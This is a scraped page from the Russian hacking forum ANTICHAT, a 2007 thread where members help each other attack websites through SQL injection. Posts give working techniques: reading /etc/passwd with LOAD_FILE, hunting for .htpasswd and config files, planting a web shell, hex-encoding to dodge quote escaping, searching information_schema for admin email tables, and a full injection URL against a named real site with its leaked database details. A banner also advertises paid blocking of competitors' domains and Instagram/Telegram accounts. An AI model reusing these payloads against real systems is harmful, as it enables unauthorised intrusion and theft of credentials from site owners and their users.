УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 31 из 2438

Опции темы

Поиск в этой теме

Опции просмотра

где лежат пароли?

#301

13.11.2007, 02:24

fervex

Новичок

Регистрация: 12.11.2007

Сообщений: 25

Провел на форуме:
36633

Репутация: 3

где лежат пароли?

Здравствуйте!

По SQL injection FAQ и ещё одному FAQ вытащил файл '/etc/passwd' через LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119 ,100)), а в нем НЕТ НИ ОДНОГО пароля!

Имеет вид:

Код:

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/bin/bash vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin SSH:/var/empty/sshd:/sbin/nologin  apache:x:48:48:Apache:/var/www:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/html/usage:/sbin/nologin trasfert:x:500:500::/home/trasfert:/bin/bash ftpdumprm:x:501:501::/home/ftpdumprm:/bin/bash

Пароль root есть в MySQL хеше, подбирается, но вероятность не велика ))

Подскажите, с этими данными что-нибудь можно сделать? Где нормальный файл с паролями может лежать?

Спасибо!

#302

13.11.2007, 02:27

Constantine

Members of Antichat - Level 5

Регистрация: 24.11.2006

Сообщений: 927

Провел на форуме:
7192869

Репутация: 3033

попробуй прочитать .httpdconfig в нем можно найти пути до .htpasswd или до виртуал хоста.. в etc\passwd паролей нет впринципе

__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ

#303

13.11.2007, 02:42

fervex

Новичок

Регистрация: 12.11.2007

Сообщений: 25

Провел на форуме:
36633

Репутация: 3

Цитата:

Сообщение от Constantine

попробуй прочитать .httpdconfig в нем можно найти пути до .htpasswd или до виртуал хоста.. в etc\passwd паролей нет впринципе

а в какой папке его можно искать?
/conf/.httpdconfig
/.httpdconfig
/etc/.httpdconfig нет

#304

13.11.2007, 02:43

halkfild

Leaders of Antichat - Level 4

Регистрация: 11.11.2005

Сообщений: 391

Провел на форуме:
7084941

Репутация: 2277

поищи раскрытие путей на сайте что бы получить полный путь..
попробуй почитать конфигы форума, сайта

так же конфигы http://forum.antichat.ru/thread49775.html /*тут они относительные, переделай под полныйпуть*/

з.ы. попробуй вывод в файл, сделай себе шелл, если есть права на запись в директорию

#305

13.11.2007, 02:54

fervex

Новичок

Регистрация: 12.11.2007

Сообщений: 25

Провел на форуме:
36633

Репутация: 3

Спасибо, буду пробовать пути

шелл не получится - кавычки нельзя использовать

#306

13.11.2007, 02:56

~~Piflit~~

Banned

Регистрация: 11.08.2006

Сообщений: 1,522

Провел на форуме:
5128756

Репутация: 2032

Отправить сообщение для Piflit с помощью ICQ

fervex используй хекс

#307

13.11.2007, 17:49

ENFIX

Участник форума

Регистрация: 06.06.2006

Сообщений: 213

Провел на форуме:
1628290

Репутация: 474

Отправить сообщение для ENFIX с помощью ICQ

Piflit, если кавычки экранируются, шелл не зальешь, ибо в них нужно будет указывать путь, в хексе он работать не будет

#308

13.11.2007, 18:57

fobofob

Участник форума

Регистрация: 02.08.2007

Сообщений: 242

Провел на форуме:
1373642

Репутация: 569

Подскажите возможно ли с помощью information_schema узнать таблицу в которой находится email админа,и как этот запрос должен быть составлен? Мыло админа известно,а вот таблица где должен по идее и хеш с логином лежать-нет ( конечно можно проверить каждую таблу на содержание интересующего,но их там более 500,а вывод колонок по 1 еденице. Пробовал наиболее вероятные таблицы-безрезультатно.

#309

13.11.2007, 19:08

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

Отправить сообщение для Scipio с помощью ICQ

чтото типа этого
union select table_name from information_schema.columns where column_name like '%25mail%25'/*

вобще правильно ставить % в like, но лучше использовать url-кодировку

Это ты получаешь имя таблиц где есть поле в названии которого есть сочетание mail, а там limit`ом перебирай

можешь также подставлять user,admin,pass,login и т.д.

__________________
Карфаген должен быть разрушен...

Последний раз редактировалось Scipio; 13.11.2007 в 19:17..

Подскажите в примерах,пож.

#310

14.11.2007, 18:04

5taY3r

Познающий

Регистрация: 10.05.2007

Сообщений: 38

Провел на форуме:
453576

Репутация: 100

Подскажите в примерах,пож.

Что дальше делать с этим счастьем? Желательно подробно и в примерах...)
P.S. сам только учусь)

Цитата:

http://www.euro26.ee/www/sisu.php?id=3&page=-1+union+select+1,2,3,4,5,aes_decrypt(aes_encrypt(C ONCAT_WS(0x3A,VERSION(),USER(),DATABASE()),0x71),0 x71),7,8,9,10,11,12,13,14/*

Выводит:
4.1.15:d11071sa14532@z17.zone.ee:d11071sd8708

Страница 31 из 2438

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Сценарии/CMF/СMS	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход